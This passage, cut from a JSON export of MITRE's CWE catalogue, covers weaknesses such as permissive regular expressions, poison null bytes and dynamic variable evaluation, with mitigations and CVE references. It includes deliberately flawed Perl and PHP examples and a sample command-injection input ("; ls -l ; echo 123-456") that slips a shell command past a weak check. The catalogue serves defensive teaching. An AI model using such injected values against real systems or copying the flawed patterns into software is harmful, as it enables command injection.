functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0708"},{"Reference":"CVE-2006-7160","Description":"DoS in firewall using standard Microsoft functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7160"},{"Reference":"CVE-2007-1376","Description":"function does not verify that its argument is the proper type, leading to arbitrary memory write","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1376"},{"Reference":"CVE-2007-1220","Description":"invalid syscall arguments bypass code execution limits","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1220"},{"Reference":"CVE-2006-4541","Description":"DoS in IDS via NULL argument","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4541"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP27","Entry_Name":"Tainted input to environment"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Unvalidated Function Hook Arguments","attr":{"@_Date":"2012-10-30"}}}},"623":{"attr":{"@_ID":"623","@_Name":"Unsafe ActiveX Control Marked Safe For Scripting","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting.","Extended_Description":"This might allow attackers to use dangerous functionality via a web page that accesses the control, which can lead to different resultant vulnerabilities, depending on the control\'s behavior.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"267","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"618","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During development, do not mark it as safe for scripting."},{"Phase":"System Configuration","Description":"After distribution, you can set the kill bit for the control so that it is not accessible from Internet Explorer."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0617","Description":"control allows attackers to add malicious email addresses to bypass spam limits","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0617"},{"Reference":"CVE-2007-0219","Description":"web browser uses certain COM objects as ActiveX","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0219"},{"Reference":"CVE-2006-6510","Description":"kiosk allows bypass to read files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6510"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-510"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 16, "What ActiveX Components Are Safe for Initialization and Safe for Scripting?" Page 510"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, "ActiveX Security", Page 749"}}]},"Notes":{"Note":{"#text":"It is suspected that this is under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"624":{"attr":{"@_ID":"624","@_Name":"Executable Regular Expression Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a regular expression that either (1) contains an executable component with user-controlled inputs, or (2) allows a user to enable execution by inserting pattern modifiers.","Extended_Description":"Case (2) is possible in the PHP preg_replace() function, and possibly in other languages when a user-controlled input is inserted into a string that is later parsed as a regular expression.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"The regular expression feature in some languages allows inputs to be quoted or escaped before insertion, such as \\\\Q and \\\\E in Perl."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-2059","Description":"Executable regexp in PHP by inserting \\"e\\" modifier into first argument to preg_replace","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2059"},{"Reference":"CVE-2005-3420","Description":"Executable regexp in PHP by inserting \\"e\\" modifier into first argument to preg_replace","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3420"},{"Reference":"CVE-2006-2878","Description":"Complex curly syntax inserted into the replacement argument to PHP preg_replace(), which uses the \\"/e\\" modifier","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2878"},{"Reference":"CVE-2006-2908","Description":"Function allows remote attackers to execute arbitrary PHP code via the username field, which is used in a preg_replace function call with a /e (executable) modifier.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2908"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Notes":{"Note":{"#text":"Under-studied. The existing PHP reports are limited to highly skilled researchers, but there are few examples for other languages. It is suspected that this is under-reported for all languages. Usability factors might make it more prevalent in PHP, but this theory has not been investigated.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"625":{"attr":{"@_ID":"625","@_Name":"Permissive Regular Expression","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a regular expression that does not sufficiently restrict the set of allowed values.","Extended_Description":{"xhtml:p":"This effectively causes the regexp to accept substrings that match the pattern, which produces a partial comparison to the target. In some cases, this can lead to other weaknesses. Common errors include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["not identifying the beginning and end of the target string","using wildcards instead of acceptable character ranges","others"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"187","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem is frequently found when the regular expression is used in input validation or security features such as authentication."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When applicable, ensure that the regular expression marks beginning and ending string patterns, such as \\"/^string$/\\" for Perl."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-37"},"Intro_Text":"The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$phone = GetPhoneNumber();if ($phone =~ /\\\\d+-\\\\d+/) {}else {}","xhtml:br":["",""],"xhtml:div":[{"#text":"system(\\"lookup-phone $phone\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"# looks like it only has hyphens and digits","xhtml:br":""},{"#text":"error(\\"malformed number!\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"An attacker could provide an argument such as: \\"; ls -l ; echo 123-456\\" This would pass the check, since \\"123-456\\" is sufficient to match the \\"\\\\d+-\\\\d+\\" portion of the regular expression."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-1895","Description":"\\".*\\" regexp leads to static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1895"},{"Reference":"CVE-2002-2175","Description":"insertion of username into regexp results in partial comparison, causing wrong database entry to be updated when one username is a substring of another.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2175"},{"Reference":"CVE-2006-4527","Description":"regexp intended to verify that all characters are legal, only checks that at least one is legal, enabling file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4527"},{"Reference":"CVE-2005-1949","Description":"Regexp for IP address isn\'t anchored at the end, allowing appending of shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949"},{"Reference":"CVE-2002-2109","Description":"Regexp isn\'t \\"anchored\\" to the beginning or end, which allows spoofed values that have trusted values as substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2109"},{"Reference":"CVE-2006-6511","Description":"regexp in .htaccess file allows access of files whose names contain certain substrings","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6511"},{"Reference":"CVE-2006-6629","Description":"allow load of macro files whose names contain certain substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6629"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS08-J","Entry_Name":"Sanitize untrusted data passed to a regex"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Character Stripping Vulnerabilities", Page 437"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"626":{"attr":{"@_ID":"626","@_Name":"Null Byte Interaction Error (Poison Null Byte)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly handle null bytes or NUL characters when passing data between different representations or components.","Extended_Description":{"xhtml:p":["A null byte (NUL character) can have different meanings across representations or languages. For example, it is a string terminator in standard C libraries, but Perl and PHP strings do not treat it as a terminator. When two representations are crossed - such as when Perl or PHP invokes underlying C functionality - this can produce an interaction error with unexpected results. Similar issues have been reported for ASP. Other interpreters written in C might also be affected.","The poison null byte is frequently useful in path traversal attacks by terminating hard-coded extensions that are added to a filename. It can play a role in regular expression processing in PHP."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"147","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove null bytes from all incoming strings."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4155","Description":"NUL byte bypasses PHP regular expression check","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"},{"Reference":"CVE-2005-3153","Description":"inserting SQL after a NUL byte bypasses allowlist regexp, enabling SQL injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-514"}},{"attr":{"@_External_Reference_ID":"REF-515"}},{"attr":{"@_External_Reference_ID":"REF-516"}}]},"Notes":{"Note":[{"#text":"Current usage of \\"poison null byte\\" is typically related to this C/Perl/PHP interaction error, but the original term in 1998 was applied to an off-by-one buffer overflow involving a null byte.","attr":{"@_Type":"Terminology"}},{"#text":"There are not many CVE examples, because the poison NULL byte is a design limitation, which typically is not included in CVE by itself. It is typically used as a facilitator manipulation to widen the scope of potential attacks against other vulnerabilities.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"627":{"attr":{"@_ID":"627","@_Name":"Dynamic Variable Evaluation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions.","Extended_Description":"The resultant vulnerabilities depend on the behavior of the application, both at the crossover point and in any control/data flow that is reachable by the related variables or functions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"914","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Many interpreted languages support the use of a \\"$$varname\\" construct to set a variable whose name is specified by the $varname variable. In PHP, these are referred to as \\"variable variables.\\" Functions might also be invoked using similar syntax, such as $$funcname(arg1, arg2)."},"Alternate_Terms":{"Alternate_Term":{"Term":"Dynamic evaluation"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could gain unauthorized access to internal program variables and execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Refactoring","Description":"Refactor the code to avoid dynamic variable evaluation whenever possible."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Use only allowlists of acceptable variable or function names."},{"Phase":"Implementation","Description":"For function names, ensure that you are only calling functions that accept the proper number of arguments, to avoid unexpected null arguments."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0422","Description":"Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0422"},{"Reference":"CVE-2007-2431","Description":"Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2431"},{"Reference":"CVE-2006-4904","Description":"Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4904"},{"Reference":"CVE-2006-4019","Description":"Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-517"}},{"attr":{"@_External_Reference_ID":"REF-518"}}]},"Notes":{"Note":{"#text":"Under-studied, probably under-reported. Few researchers look for this issue; most public reports are for PHP, although other languages are affected. This issue is likely to grow in PHP as developers begin to implement functionality in place of register_globals.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"628":{"attr":{"@_ID":"628","@_Name":"Function Call with Incorrectly Specified Arguments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses.","Extended_Description":{"xhtml:p":"There are multiple ways in which this weakness can be introduced, including:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the wrong variable or reference;","an incorrect number of arguments;","incorrect order of arguments;","wrong type of arguments; or","wrong value."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This is usually primary to other weaknesses, but it can be resultant if the function\'s API or function prototype changes."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Access Control"],"Impact":["Quality Degradation","Gain Privileges or Assume Identity"],"Note":"This weakness can cause unintended behavior and can lead to additional weaknesses such as allowing an attacker to gain unintended access to system resources."}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"Since these bugs typically introduce incorrect behavior that is obvious to users, they are found quickly, unless they occur in rarely-tested code paths. Managing the correct number of arguments can be made more difficult in cases where format strings are used, or when variable numbers of arguments are supported."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Description":"Once found, these issues are easy to fix. Use code inspection tools and relevant compiler features to identify potential violations. Pay special attention to code that is not likely to be exercised heavily during QA."},{"Phase":"Architecture and Design","Description":"Make sure your API\'s are stable before you use them in production code."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-62"},"Intro_Text":"The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username, $password) {}authenticate($_POST[\'password\'], $_POST[\'username\']);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// authenticate user"}},"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-63"},"Intro_Text":"This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub ReportAuth {}sub PrivilegedFunc{}","xhtml:div":[{"#text":"my ($username, $result, $fatal) = @_;PrintLog(\\"auth: username=%s, result=%d\\", $username, $result);if (($result ne \\"success\\") && $fatal) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"die \\"Failed!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"my $result = CheckAuth($username);ReportAuth($username, $result, 